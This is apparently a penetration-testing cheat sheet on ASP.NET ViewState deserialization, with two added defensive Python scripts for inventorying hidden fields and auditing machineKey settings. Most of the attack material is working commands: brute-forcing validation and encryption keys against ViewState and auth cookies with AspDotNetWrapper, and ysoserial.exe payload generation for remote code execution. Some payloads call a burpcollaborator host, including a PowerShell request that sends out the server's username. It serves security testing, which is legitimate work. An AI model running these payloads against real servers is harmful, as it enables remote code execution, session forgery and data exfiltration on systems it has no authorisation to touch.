View State

View State:
Used in the ASP.NET framework. This hidden input field holds the state of the page and its controls, and can contain serialized data.

Event Validation:
Checks incoming data to validate possible values and return errors when invalid data is submitted.

Serialization Formats:

  • ObjectStateFormatter: Default Deserializer
  • LOSFormatter: Default Serializer
  • BinaryFormatter:

Common Parameters and Cookies:

  • __PREVIOUSPAGE
  • __VIEWSTATE
  • .aspxauth
  • asp.net.applicationcookie
  • __VIEWSTATEGENERATOR
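
To inventory which of these fields one of your own pages emits, and whether its __VIEWSTATE is a readable serialized stream, the following added example (not part of the original page) parses a response body. It relies on ObjectStateFormatter output starting with the bytes 0xFF 0x01; the sample HTML and its values are constructed, and `triage` is a hypothetical helper name.

```python
import base64
from html.parser import HTMLParser

# Hidden fields named on this page, plus the event validation field.
FIELDS = {"__VIEWSTATE", "__VIEWSTATEGENERATOR", "__VIEWSTATEENCRYPTED",
          "__PREVIOUSPAGE", "__EVENTVALIDATION"}

# Constructed sample response body; both values are made up for the example.
SAMPLE_HTML = """<form method="post" action="./default.aspx">
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUBMGRk" />
<input type="hidden" name="__VIEWSTATEGENERATOR" value="0A1B2C3D" />
</form>"""


class HiddenFields(HTMLParser):
    """Collects the value of every <input> whose name is in FIELDS."""

    def __init__(self):
        super().__init__()
        self.found = {}

    def handle_starttag(self, tag, attrs):
        attributes = dict(attrs)
        if tag == "input" and attributes.get("name") in FIELDS:
            self.found[attributes["name"]] = attributes.get("value") or ""


def triage(html):
    """Report which state fields a page emits and how __VIEWSTATE looks."""
    parser = HiddenFields()
    parser.feed(html)
    report = {
        "fields": sorted(parser.found),
        "encrypted_marker": "__VIEWSTATEENCRYPTED" in parser.found,
    }
    value = parser.found.get("__VIEWSTATE")
    if value:
        raw = base64.b64decode(value + "=" * (-len(value) % 4))
        report["viewstate_bytes"] = len(raw)
        # 0xFF 0x01 is the ObjectStateFormatter header: the stream is not encrypted.
        report["plaintext_stream"] = raw[:2] == b"\xff\x01"
    return report


if __name__ == "__main__":
    print(triage(SAMPLE_HTML))
```

A `plaintext_stream` of `True` only says the state is readable; it does not tell you whether a MAC is appended.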

MAC Enabled

Types of MACs:

  • [SHA1](/Crypto/Hash Functions/SHA1)
  • [AES](/Crypto/Symmetric Encryption/AES)
  • [MD5](/Crypto/Hash Functions/MD5)
  • HMACSHA256
  • HMACSHA384
  • HMACSHA512

Blackbox Testing

Check whether an error is returned with the following command:

curl "https://victim.com/path/page.aspx?__VIEWSTATE=AAAA"

Leaking the Validation Key

The validation key can be found in the web.config file under the machineKey tag. Otherwise it must be leaked through an information disclosure vulnerability.

Test Common Validation Keys:

#Take data from
AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata 195A989biBjM_NAqqiie5DnHKfcwrNGDuT-Suumqmw6oVyLSsjCFx9Emhf034TDjcuC9mfwNbi6yD-1QlbhcUAgdTOwY0o0sNbg7bJrNyUEf6ZoyYh2QAZHhmxteN_cMQJI7C1WOBEl0ocihUVhKghdxegwRURcYx2h1uMbijX3jsEf59L8Uco_PpfFLN--RtcLTKUvtZd0fH5Sgc1JQmsvTBr7IJ4Ua01I8uyEPYNXZGYvssSzJ8YN6MXioky3WBXv9NGNxDpgTpIPWGetgZ0iOSaTmqPr6sPu4ndesUV4SKsBroIP6Y38rr8LwFCZBKDK5dli4kKwmy9xeM02qshCoLf8ppeOiK2aMLfb9jqkraoss2BflD3hpDdrYHVGH7ryTWQh4HABYDC7OOMgdld3WJ1CUfJ9pmr0qnVFD4Gc --decrypt --purpose=owin.cookie

Encrypted

Types of Encryption:

  • [AES](/Crypto/Symmetric Encryption/AES) (Default)
  • 3DES
  • [DES](/Crypto/Symmetric Encryption/DES)

Black Box Testing

Remove the __VIEWSTATEENCRYPTED parameter from the request and test the deserialization. If it returns a ViewState MAC validation error, that confirms a MAC is enabled.

Leaking the Encryption Key

Usually found in the web.config or machine.config files
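
Because both the validation key and the encryption key live in the machineKey element, a configuration audit covers the two "Leaking the ... Key" sections at once. This is an added example, not code from the original page: it flags a disabled MAC, the older algorithms from the lists above, keys written into the file, and keys that match a published-key list. The sample config is constructed, and `audit_machine_key` and `published_keys` are hypothetical names (the caller loads the list from whatever source they use).

```python
import xml.etree.ElementTree as ET

# Constructed sample web.config; the key value is a placeholder, not a real key.
SAMPLE_CONFIG = """<configuration><system.web>
  <pages enableViewStateMac="false" />
  <machineKey validation="SHA1" decryption="3DES"
              validationKey="00112233445566778899AABBCCDDEEFF"
              decryptionKey="AutoGenerate,IsolateApps" />
</system.web></configuration>"""

OLDER_VALIDATION = {"MD5", "SHA1"}   # the page also lists HMACSHA256/384/512
OLDER_DECRYPTION = {"DES", "3DES"}   # the page lists AES as the default


def local_name(element):
    """Tag name without an XML namespace prefix, if the file declares one."""
    return element.tag.rsplit("}", 1)[-1]


def audit_machine_key(xml_text, published_keys=()):
    """Return sorted finding codes for one web.config/machine.config document."""
    published = {key.upper() for key in published_keys}
    findings = set()
    for element in ET.fromstring(xml_text).iter():
        name = local_name(element)
        if name == "pages":
            if element.get("enableViewStateMac", "true").lower() == "false":
                findings.add("mac-disabled")
        elif name == "machineKey":
            if element.get("validation", "").upper() in OLDER_VALIDATION:
                findings.add("older-validation-alg")
            if element.get("decryption", "").upper() in OLDER_DECRYPTION:
                findings.add("older-decryption-alg")
            for attr in ("validationKey", "decryptionKey"):
                value = element.get(attr, "AutoGenerate").upper()
                if value.startswith("AUTOGENERATE"):
                    continue  # key is generated, not written in the file
                findings.add("static-" + attr)
                if value in published:
                    findings.add("published-" + attr)
    return sorted(findings)


if __name__ == "__main__":
    for finding in audit_machine_key(SAMPLE_CONFIG):
        print(finding)
```

A `static-` finding means anyone who can read the file holds the key; a `published-` finding means the key should be rotated immediately.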

AES256Decryptor
Test Common AES Encryption Keys:

#Take data from the __VIEWSTATE parameter
python decrypter.py --data "DACE7CF24FF4901DF59CAAACDA1EBDEA" --format hex
python decrypter.py --data "2s588k/0kB31nKqs2h696g==" --format base64

Test Common Encryption Keys against the ViewState:

#Take data from __VIEWSTATE
AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata Ve3mZjZwbMRyGTts1EV0F7Hp4eAx11qmXi45oAE7/bDDmA55+Kf9+WWACzUQtly4pRQYkMgmZJnJIDCQQhLNCWaHKbgY7dOiHn8JE7Yx19xvVhYyoqnC8ITLvHiiuJl8+LFmPJwS7ip3vAe+o7mxg2H15VUW5LO56AiTErT7UUw4Au002vflZUF6h/Fx/TJAYciUlZ8CmNW9/GIoPAC9tQ4SVhGD7is8Gu8DiUJE0AjHTLQFcy9vgSk1ovpy4gn9gl98mNVk17uCI7LLYPkvO3Xuix2WTogyqaPQOn7gJz7Say/aqqhmW90LdGo0qeldEUvMGw== --decrypt --purpose=viewstate --IISDirPath "/" --TargetPagePath "/Content/default.aspx"

Test Common Encryption Keys against the asp.net.applicationcookie:

#Take data from asp.net.applicationcookie
AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata 195A989biBjM_NAqqiie5DnHKfcwrNGDuT-Suumqmw6oVyLSsjCFx9Emhf034TDjcuC9mfwNbi6yD-1QlbhcUAgdTOwY0o0sNbg7bJrNyUEf6ZoyYh2QAZHhmxteN_cMQJI7C1WOBEl0ocihUVhKghdxegwRURcYx2h1uMbijX3jsEf59L8Uco_PpfFLN--RtcLTKUvtZd0fH5Sgc1JQmsvTBr7IJ4Ua01I8uyEPYNXZGYvssSzJ8YN6MXioky3WBXv9NGNxDpgTpIPWGetgZ0iOSaTmqPr6sPu4ndesUV4SKsBroIP6Y38rr8LwFCZBKDK5dli4kKwmy9xeM02qshCoLf8ppeOiK2aMLfb9jqkraoss2BflD3hpDdrYHVGH7ryTWQh4HABYDC7OOMgdld3WJ1CUfJ9pmr0qnVFD4Gc --decrypt --purpose=owin.cookie

Test Common Encryption Keys against the .aspxauth cookie:

#Take data from the .aspxauth cookie
AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata CA387A93AD4214F356ED05C26C1E4D80F0804CD526766778B62D4F9213B87B5369755F95008A34644B9CA6B7646E191958A1AE14DB398AB943D3DB042EDA06EC4B5BEA9E3EB60E9877646AD4A50BE9435A2D3B4B3005836CBBBDA64A5E8738511211AA1F --decrypt --purpose=aspxauth

Payloads

Test Exploit with MAC Disabled:

ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "nslookup test.burpcollaborator.net" > payload_when_mac_disabled
ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "powershell.exe Invoke-WebRequest -Uri http://test.burpcollaborator.net/$env:UserName" > payload_when_mac_disabled
#Set output as POST Parameter __VIEWSTATE=$output

Exploit with MAC Enabled:

ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "nslookup test.burpcollaborator.net" --islegacy --isdebug --validationalg="SHA1" --validationkey="011165C2E613D02353C3C59EBECAE15F2EB8D4075D05B04CCD9075F26B80503CFE44C7099E3B97EDD4537B8F98D274784FABF5EBCAB255F861B2CEAE82750EB0" --apppath="/" --path="Hello.aspx" > payload_for_blog.txt
#Set output as POST Parameter __VIEWSTATE=$output

Exploit with MAC and Encryption Enabled:

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "nslookup test.burpcollaborator.net" --generator=93D20A1B --validationalg="SHA1" --validationkey="70DBADBFF4B7A13BE67DD0B11B177936F8F3C98BCE2E0A4F222F7A769804D451ACDB196572FFF76106F33DCEA1571D061336E68B12CF0AF62D56829D2A48F1B0" > payload_for_blog.txt
#Set output as POST Parameter __VIEWSTATE=$output

Exploit with MAC and Encryption Enabled:

ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "nslookup test.burpcollaborator.net" --path="/site/test.aspx/" --apppath="/directory" --decryptionalg="AES" --decryptionkey="EBA4DC83EB95564524FA63DB6D369C9FBAC5F867962EAC39" --validationalg="SHA1" --validationkey="B3C2624FF313478C1E5BB3B3ED7C21A121389C544F3E38F3AA46C51E91E6ED99E1BDD91A70CFB6FCA0AB53E99DD97609571AF6186DE2E4C0E9C09687B6F579B3" > payload_for_blog.txt
#Set output as POST Parameter __VIEWSTATE=$output

Exploit with MAC and Encryption Enabled with ViewStateUserKey used:

ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "nslookup test.burpcollaborator.net" --path="/site/test.aspx/" --apppath="/directory" --decryptionalg="AES" --decryptionkey="EBA4DC83EB95564524FA63DB6D369C9FBAC5F867962EAC39" --validationalg="SHA1" --validationkey="B3C2624FF313478C1E5BB3B3ED7C21A121389C544F3E38F3AA46C51E91E6ED99E1BDD91A70CFB6FCA0AB53E99DD97609571AF6186DE2E4C0E9C09687B6F579B3" --viewstateuserkey="randomstringdefinedintheserver" > payload_for_blog.txt
#Set output as POST Parameter __VIEWSTATE=$output

Tools: